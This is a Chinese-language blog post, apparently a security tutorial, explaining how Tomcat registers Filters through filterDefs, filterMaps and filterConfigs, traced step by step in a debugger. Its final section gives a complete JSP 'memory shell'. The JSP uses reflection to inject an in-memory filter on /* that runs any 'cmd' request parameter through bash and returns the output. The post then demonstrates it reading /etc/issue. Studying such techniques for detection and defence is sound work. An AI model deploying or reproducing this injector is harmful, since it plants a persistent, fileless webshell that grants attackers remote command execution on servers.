Loading

Tomcat 内存马(二)Filter型

一、Tomcat处理请求

在前一个章节讲到,tomcat在处理请求时候,首先会经过连接器Coyote把request对象转换成ServletRequest后,传递给Catalina进行处理。

img

在Catalina中有四个关键的容器,分别为Engine、Host、Context、Wrapper。这四种容器成套娃式的分层结构设计。

img

接下来我们知道当tomcat接收到请求时候,依次会经过Listener -> Filter -> Servlet

img

其实我们也可以通过动态添加Filter来构成内存马,不过在此之前先了解下tomcat处理请求的逻辑

image-20211008150441124

从上图中可以看到,请求到达Wrapper容器时候,会开始调用FilterChain,这个FilterChain就是若干个Filter组成的过滤器链。最后才会达到Servlet。只要把我们的恶意filter放入filterchain的第一个位置,就可以触发恶意filter中的方法。

二、Filter注册流程

要在FilterChain中加入恶意filter,首先要了解tomcat中Filter的注册流程

image-20211008150902781

在上图中可以看到,Wrapper容器调用FilterChain的地方就在StandardWrapperValve类中

image-20211008151513072

调试

注册一个filter:

public class TestFilter implements Filter {
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        System.out.println("filter初始化");
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        System.out.println("doFilter过滤");
        //放行
        chain.doFilter(request,response);
    }

    @Override
    public void destroy() {
        System.out.println("filter销毁");

    }
}

配置web.xml

 <filter>
        <filter-name>TestFilter</filter-name>
        <filter-class>test.TestFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>TestFilter</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>

在doFilter处下断点,访问任意url:http://127.0.0.1:8080/xxx

image-20211008154236382

查看调用链

image-20211008153322507

可以看到在StandardWrapperValve#invoke中,通过createFilterChain方法获得了一个ApplicationFilterChain类型的filterChain

image-20211008154518782

其filterChain中存放了两个ApplicationFilterConfig类型的filter,其中第一个就是TestFilter

image-20211008183338196

然后在下面196行调用了ApplicationFilterChain#doFilter

image-20211008154656668

跟进doFilter方法,在方法中调用了internalDoFilter

image-20211008181437747

跟进internalDoFilter后看到,从filters数组里面拿到了第一个filter即Testfilter

image-20211008181549596

最后调用了filter.doFilter

image-20211008181707799

image-20211008181729911

可以看到,filter是从filters数组中拿到的,看看filters数组是什么,Ctrl+左击

image-20211009101102444

其实就是一个ApplicationFilterConfig类型的对象数组,它的值也就是前面的说的通过createFilterChain方法获得的

image-20211008154518782

image-20211008183338196

接下来查看createFilterChain如何把我们写的TestFilter添加ApplicationFilterConfig

跟进ApplicationFilterFactory#createFilterChain中,看到首先64行拿到了个ServletRequest,然后通过ServletRequest#getFilterChain获取到了filterChain

image-20211011150906390

继续往下看,通过StandardContext对象找到了filterMaps[]

image-20211011151125710

然后又通过filterMaps中的名字,找到StandardContext对象中的FilterConfig,最后把FilterConfig加入了filterChain中

image-20211011152154941

跟进filterChain.addFilter看到,也就是加入了前面说的filters数组ApplicationFilterConfig中。这里和上面一步的操作就是遍历filter放入ApplicationFilterConfig

image-20211011152538983

通过调试发现,有两个很重要的变量,filterMap和filterConfig

  • filterMaps拿名字

  • filterConfigs拿过滤器

其实这两个变量都是在StandardContext对象里面存放了,其中还有个变量filterDefs也是重要的变量

image-20211011151125710

image-20211011150712946

分析filterMaps、filterConfigs、filterDefs

1)filterMaps

既然这三个变量都是从StandardContext中获得,那么查看StandardContext发现有两个方法可以添加filterMap

image-20211011153145987

image-20211011153130293

2)filterConfigs

StandardContext中同样寻找添加filterConfig值的地方,发现有一处filterStart方法

image-20211011153703552

此处添加是在tomcat启动时完成,所以下好断点启动tomcat

filterDefs中存放着TestFilter

image-20211011154139448

遍历这个filterDefs,拿到key为TestFilter,value为FilterDef对象,值test.Testfilter

image-20211011154225299

接下来new了一个ApplicationFilterConfig,放入了value

image-20211011154449349

然后把nam=TestFilter和filterConfig放入了filterConfigs

image-20211011154928992

3)filterDefs

以上的filterDefs才是真正放了过滤器的地方,那么我们看下filterDefs在哪里被加入了

StandardContext中同样有个addFilterDef方法

image-20211011155245728

可以想到,tomcat是从web.xml中读取的filter,然后加入了filterMap和filterDef变量中,以下对应着这两个变量

image-20211011154701839

内存马

我们通过控制filterMaps、filterConfigs、filterDefs的值,则可以注入恶意的filter

  • filterMaps:一个HashMap对象,包含过滤器名字和URL映射

  • filterDefs:一个HashMap对象,过滤器名字和过滤器实例的映射

  • filterConfigs变量:一个ApplicationFilterConfig对象,里面存放了filterDefs

<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<%
     final String name = "KpLi0rn";
     ServletContext servletContext = request.getSession().getServletContext();

     Field appctx = servletContext.getClass().getDeclaredField("context");
     appctx.setAccessible(true);
     ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);

     Field stdctx = applicationContext.getClass().getDeclaredField("context");
     stdctx.setAccessible(true);
     StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

     Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
     Configs.setAccessible(true);
     Map filterConfigs = (Map) Configs.get(standardContext);

     if (filterConfigs.get(name) == null){
          Filter filter = new Filter() {
               @Override
               public void init(FilterConfig filterConfig) throws ServletException {

               }

               @Override
               public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                    HttpServletRequest req = (HttpServletRequest) servletRequest;
                    if (req.getParameter("cmd") != null){
                         byte[] bytes = new byte[1024];
                         Process process = new ProcessBuilder("bash","-c",req.getParameter("cmd")).start();
                         int len = process.getInputStream().read(bytes);
                         servletResponse.getWriter().write(new String(bytes,0,len));
                         process.destroy();
                         return;
                    }
                    filterChain.doFilter(servletRequest,servletResponse);
               }

               @Override
               public void destroy() {

               }

          };


          FilterDef filterDef = new FilterDef();
          filterDef.setFilter(filter);
          filterDef.setFilterName(name);
          filterDef.setFilterClass(filter.getClass().getName());
          /**
           * 将filterDef添加到filterDefs中
           */
          standardContext.addFilterDef(filterDef);

          FilterMap filterMap = new FilterMap();
          filterMap.addURLPattern("/*");
          filterMap.setFilterName(name);
          filterMap.setDispatcher(DispatcherType.REQUEST.name());

          standardContext.addFilterMapBefore(filterMap);

          Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
          constructor.setAccessible(true);
          ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

          filterConfigs.put(name,filterConfig);
          out.print("Inject Success !");
     }
%>

访问:http://127.0.0.1:8080/testF.jsp显示注入成功
image-20211012105306777

执行命令:http://127.0.0.1:8080/?cmd=cat /etc/issue

image-20211012105331940

三、参考:

http://wjlshare.com/archives/1529#0x04_Filter

http://li9hu.top/tomcat内存马一-初探/

https://www.cnblogs.com/nice0e3/p/14622879.html#0x03-内存马实现

posted @ 2021-11-06 10:35  Atomovo  阅读(546)  评论(0编辑  收藏  举报